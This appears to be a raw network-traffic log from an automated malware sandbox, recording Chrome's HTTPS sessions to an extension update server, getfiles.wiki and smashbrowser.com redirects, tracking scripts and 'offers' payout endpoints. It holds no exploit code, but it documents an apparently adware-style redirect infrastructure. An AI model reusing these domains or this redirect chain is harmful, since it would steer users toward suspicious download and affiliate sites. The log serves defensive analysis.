                                                                                                                  2023-03-21 12:20:43 UTC0OUTGET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                                                                                                                  Host: clients2.google.com
                                                                                                                  Connection: keep-alive
                                                                                                                  X-Goog-Update-Interactivity: fg
                                                                                                                  X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfm
                                                                                                                  X-Goog-Update-Updater: chromecrx-84.0.4147.135
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:20:43 UTC1INHTTP/1.1 200 OK
                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-28WSmu0jBMVKKZL2DSgTRQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                  Date: Tue, 21 Mar 2023 12:20:43 GMT
                                                                                                                  Content-Type: text/xml; charset=UTF-8
                                                                                                                  X-Daynum: 5923
                                                                                                                  X-Daystart: 19243
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Server: GSE
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Accept-Ranges: none
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  2023-03-21 12:20:43 UTC2INData Raw: 33 31 61 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 67 75 70 64 61 74 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 75 70 64 61 74 65 32 2f 72 65 73 70 6f 6e 73 65 22 20 70 72 6f 74 6f 63 6f 6c 3d 22 32 2e 30 22 20 73 65 72 76 65 72 3d 22 70 72 6f 64 22 3e 3c 64 61 79 73 74 61 72 74 20 65 6c 61 70 73 65 64 5f 64 61 79 73 3d 22 35 39 32 33 22 20 65 6c 61 70 73 65 64 5f 73 65 63 6f 6e 64 73 3d 22 31 39 32 34 33 22 2f 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 6e 6d 6d 68 6b 6b 65 67 63 63 61 67 64 6c 64 67 69 69 6d 65 64 70 69 63 63 6d 67 6d 69 65 64 61 22 20 63 6f 68 6f 72 74 3d 22 31 3a 3a 22 20 63 6f 68 6f 72 74 6e 61 6d 65 3d 22 22
                                                                                                                  Data Ascii: 31a<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="5923" elapsed_seconds="19243"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
                                                                                                                  2023-03-21 12:20:43 UTC3INData Raw: 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 68 61 73 68 5f 73 68 61 32 35 36 3d 22 38 31 65 33 61 34 64 34 33 61 37 33 36 39 39 65 31 62 37 37 38 31 37 32 33 66 35 36 62 38 37 31 37 31 37 35 63 35 33 36 36 38 35 63 35 34 35 30 31 32 32 62 33 30 37 38 39 34 36 34 61 64 38 32 22 20 70 72 6f 74 65 63 74 65 64 3d 22 30 22 20 73 69 7a 65 3d 22 32 34 38 35 33 31 22 20 73 74 61 74 75 73 3d 22 6f 6b 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 2e 30 2e 36 22 2f 3e 3c 2f 61 70 70 3e 3c 61 70 70 20 61 70 70 69 64 3d 22 70 6b 65 64 63 6a 6b 64 65 66 67 70 64 65 6c 70 62 63 6d 62 6d 65 6f 6d 63 6a 62 65 65 6d 66 6d 22 20 73 74 61 74 75 73 3d 22 65 72 72 6f 72 2d 75 6e 6b 6e 6f 77 6e
                                                                                                                  Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app><app appid="pkedcjkdefgpdelpbcmbmeomcjbeemfm" status="error-unknown
                                                                                                                  2023-03-21 12:20:43 UTC3INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  1192.168.2.2249189188.114.97.3443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:43 UTC0OUTGET /welcome2.php HTTP/1.1
                                                                                                                  Host: smashbrowser.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:20:43 UTC5INHTTP/1.1 302 Found
                                                                                                                  Date: Tue, 21 Mar 2023 12:20:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  location: https://exturl.com/r.php?key=pvwarw3
                                                                                                                  cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                  vary: User-Agent
                                                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rl8ZcxHYjX2lrFWC3wXCZ6xKJDSP4pg3%2FIz0Qx2FGh%2B93lxqVlpKoOT9t1ufMYlpjyCA0Ysq9ai%2BrsbC60O7tZ%2FW%2BnhmEYIBzUgr877%2F177dQTpzB751appC8WkaJyr8gMcB"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 7ab6268988586927-FRA
                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                  2023-03-21 12:20:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  10192.168.2.224921054.39.156.32443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:50 UTC26OUTGET /stats/0.php?4708787&@f16&@g1&@h1&@i1&@j1679430047893&@k0&@l1&@m&@n0&@ohttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php&@q0&@r0&@s0&@ten-US&@u1280&@b1:197652976&@b3:1679430048&@b4:js15_as.js&@b5:-420&@a-_0.2.1&@vhttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzg%3D&@w HTTP/1.1
                                                                                                                  Host: s4.histats.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:20:50 UTC27INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 21 Mar 2023 12:20:50 GMT
                                                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                                                  Content-Length: 380
                                                                                                                  Connection: close
                                                                                                                  2023-03-21 12:20:50 UTC27INData Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 23 33 56 69 73 2e 20 74 6f 64 61 79 3d 31 31 30 33 22 3b 63 68 66 68 32 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73
                                                                                                                  Data Ascii: _HST_cntval="#3Vis. today=1103";chfh2(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="as


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  11192.168.2.2249214141.101.120.11443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:50 UTC28OUTGET /e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzg%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php HTTP/1.1
                                                                                                                  Host: e.dtscout.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:20:50 UTC29INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 21 Mar 2023 12:20:50 GMT
                                                                                                                  Content-Type: application/javascript
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  X-S: mtl3
                                                                                                                  Set-Cookie: m=1; Domain=dtscout.com; Expires=Tue, 21-Mar-2023 13:44:10 GMT; Max-Age=5000; Path=/; SameSite=None; Secure
                                                                                                                  Set-Cookie: oa=1; Domain=dtscout.com; Expires=Tue, 21-Mar-2023 16:20:50 GMT; Max-Age=14400; Path=/; SameSite=None; Secure
                                                                                                                  Set-Cookie: df=1679401250; Domain=dtscout.com; Expires=Thu, 29-Jun-2023 12:20:50 GMT; Max-Age=8640000; Path=/; SameSite=None; Secure
                                                                                                                  X-T: 0.525
                                                                                                                  Expires: Tue, 21 Mar 2023 12:20:49 GMT
                                                                                                                  Cache-Control: no-cache
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EC6xKFcDzHV8mWxbbIryragTPLA3Ej3YzEPm%2Fuol427hZfZewpQn14OfY3PKkiGVDK1J%2B28q486pP4RcLlNvWUIf5XYd1Tnkq0VTjYXCaoQgpJpy8bteom0uZSIEzfI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 7ab626b668ae9060-FRA
                                                                                                                  2023-03-21 12:20:50 UTC30INData Raw: 38 31 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 2e 65 78 65 63 29 7b 74 2e 65 78 65 63 3d 21 30 3b 76 61 72 20 72 3d 21 21 6e 61 76 69 67 61 74 6f 72 2e 73 65 6e 64 42 65 61 63 6f 6e 2c 63 3d 6c 28 29 2c 61 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 72 65 70 6c 61 63 65 28 22 77 77 77 2e 22 2c 22 22 29 2c 65 3d 22 5f 64 74 73 70 76 22 2c 69 3d 22 68 74 74 70 73 3a 2f 2f 74 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 70 76 2f 22 2c 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6f 7c 7c 76 6f 69 64 20 30 21 3d 3d 28 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54
                                                                                                                  Data Ascii: 81f!function(t){if(!t.exec){t.exec=!0;var r=!!navigator.sendBeacon,c=l(),a=window.location.hostname.replace("www.",""),e="_dtspv",i="https://t.dtscout.com/pv/",o=document.getElementsByTagName("head")[0];if(void 0!==o||void 0!==(o=document.getElementsByT
                                                                                                                  2023-03-21 12:20:50 UTC30INData Raw: 3b 72 65 74 75 72 6e 20 32 3d 3d 65 2e 6c 65 6e 67 74 68 3f 65 2e 70 6f 70 28 29 2e 73 70 6c 69 74 28 22 3b 22 29 2e 73 68 69 66 74 28 29 3a 6e 75 6c 6c 7d 2c 73 65 74 49 74 65 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 6e 65 77 20 44 61 74 65 3b 6e 2e 73 65 74 54 69 6d 65 28 6e 2e 67 65 74 54 69 6d 65 28 29 2b 32 35 39 32 65 36 29 2c 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 74 2b 22 3d 22 2b 28 65 7c 7c 22 22 29 2b 22 3b 20 65 78 70 69 72 65 73 3d 22 2b 6e 2e 74 6f 55 54 43 53 74 72 69 6e 67 2b 22 3b 20 70 61 74 68 3d 2f 22 7d 7d 3b 76 61 72 20 73 3d 21 31 2c 64 3d 6d 28 29 3b 6e 75 6c 6c 3d 3d 64 26 26 28 73 3d 21 30 2c 64 3d 7b 73 73 3a 70 28 31 30 29 2c 73 74 3a 63 2c 73 6c 3a 63 2c 75 31 3a 63 2c 75 33 3a 63 2c 70 76 3a
                                                                                                                  Data Ascii: ;return 2==e.length?e.pop().split(";").shift():null},setItem:function(t,e){var n=new Date;n.setTime(n.getTime()+2592e6),document.cookie=t+"="+(e||"")+"; expires="+n.toUTCString+"; path=/"}};var s=!1,d=m();null==d&&(s=!0,d={ss:p(10),st:c,sl:c,u1:c,u3:c,pv:
                                                                                                                  2023-03-21 12:20:50 UTC32INData Raw: 74 69 6f 6e 20 67 28 74 2c 65 29 7b 69 66 28 22 66 6f 72 6d 64 61 74 61 22 3d 3d 28 65 3d 65 7c 7c 22 73 74 72 69 6e 67 22 29 29 7b 76 61 72 20 6e 3d 6e 65 77 20 46 6f 72 6d 44 61 74 61 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 74 29 6e 2e 61 70 70 65 6e 64 28 22 5f 22 2b 6f 2c 74 5b 6f 5d 29 7d 65 6c 73 65 7b 6e 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 74 29 6e 2e 70 75 73 68 28 22 5f 22 2b 6f 2b 22 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 5b 6f 5d 29 29 3b 6e 3d 6e 2e 6a 6f 69 6e 28 22 26 22 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 68 28 74 2c 65 29 7b 76 61 72 20 6e 3d 65 7c 7c 6d 28 29 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 6e 75 6c 6c 3d 3d 6e 3f 6e 3d 7b 63 3a 7b 7d 7d 3a 22 63 22 69 6e 20
                                                                                                                  Data Ascii: tion g(t,e){if("formdata"==(e=e||"string")){var n=new FormData;for(var o in t)n.append("_"+o,t[o])}else{n=[];for(var o in t)n.push("_"+o+"="+encodeURIComponent(t[o]));n=n.join("&")}return n}function h(t,e){var n=e||m();for(var o in null==n?n={c:{}}:"c"in
                                                                                                                  2023-03-21 12:20:50 UTC32INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  12192.168.2.224921338.128.66.115443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:50 UTC28OUTGET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1
                                                                                                                  Host: offerszzzz.click
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:20:50 UTC33INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.22.0
                                                                                                                  Date: Tue, 21 Mar 2023 12:20:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                  2023-03-21 12:20:50 UTC33INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  13192.168.2.224921238.128.66.115443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:50 UTC29OUTGET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1
                                                                                                                  Host: offersss.click
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2023-03-21 12:20:50 UTC33INHTTP/1.1 200 OK
                                                                                                                  Server: nginx/1.22.0
                                                                                                                  Date: Tue, 21 Mar 2023 12:20:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                  2023-03-21 12:20:50 UTC33INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  14192.168.2.2249215141.101.120.11443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:50 UTC32OUTGET /pv/?_a=v&_h=getfiles.wiki&_ss=44fghon7au&_pv=1&_ls=0&_u1=1&_u3=1&_cc=ch&_pl=d&_cbid=63lw&_cb=_dtspv.c HTTP/1.1
                                                                                                                  Host: t.dtscout.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: m=1; oa=1; df=1679401250
                                                                                                                  2023-03-21 12:20:50 UTC33INHTTP/1.1 200 OK
                                                                                                                  Date: Tue, 21 Mar 2023 12:20:50 GMT
                                                                                                                  Content-Type: application/javascript
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  X-T: 0.135
                                                                                                                  X-C: 0
                                                                                                                  Expires: Tue, 21 Mar 2023 12:20:49 GMT
                                                                                                                  Cache-Control: no-cache
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bNk74WskJuudd8YiJZmOXmFUUgekcKEkZpcOYFvwEuJ8LSURmOMpANrigPHxb0swLwACkqTiopJR8UQo%2FQbVOgsQlCg7aOLKwJRIBDZMCwmXKhitzSpxqDOnxB9kOvI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 7ab626b8ca039bb6-FRA
                                                                                                                  2023-03-21 12:20:50 UTC34INData Raw: 33 32 0d 0a 74 72 79 7b 5f 64 74 73 70 76 2e 63 28 7b 22 62 22 3a 22 63 68 72 6f 6d 65 40 38 34 22 7d 2c 27 36 33 6c 77 27 29 3b 7d 63 61 74 63 68 28 65 29 7b 7d 0d 0a
                                                                                                                  Data Ascii: 32try{_dtspv.c({"b":"chrome@84"},'63lw');}catch(e){}
                                                                                                                  2023-03-21 12:20:50 UTC34INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  15192.168.2.2249203188.114.97.3443C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  2023-03-21 12:20:51 UTC34OUTGET /favicon.ico HTTP/1.1
                                                                                                                  Host: getfiles.wiki
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
                                                                                                                  Accept: image/webp,image/apng,image/*,*/*;q=0.8
                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                  Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: HstCfa4708787=1679430047893; HstCla4708787=1679430047893; HstCmu4708787=1679430047893; HstPn4708787=1; HstPt4708787=1; HstCnv4708787=1; HstCns4708787=1
                                                                                                                  2023-03-21 12:20:51 UTC37INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 21 Mar 2023 12:20:51 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                  pragma: no-cache
                                                                                                                  vary: User-Agent
                                                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                                                  CF-Cache-Status: BYPASS
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c8%2BCrm4NPt8S6LMv8LkUdKVGM1%2BdE8Prwy3CjAgKoWNEtN8TXYqpef2wgOOMPn7TKkUOyHWeJn3MNlMS7SZ6rVUAvqvRoTsTYnyjR4LbyjZapA8oYhK8KQrJoXYsjxwb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 7ab626bade183826-FRA
                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                  2023-03-21 12:20:51 UTC37INData Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69
                                                                                                                  Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helveti
                                                                                                                  2023-03-21 12:20:51 UTC38INData Raw: 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f
                                                                                                                  Data Ascii: uld not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);bo
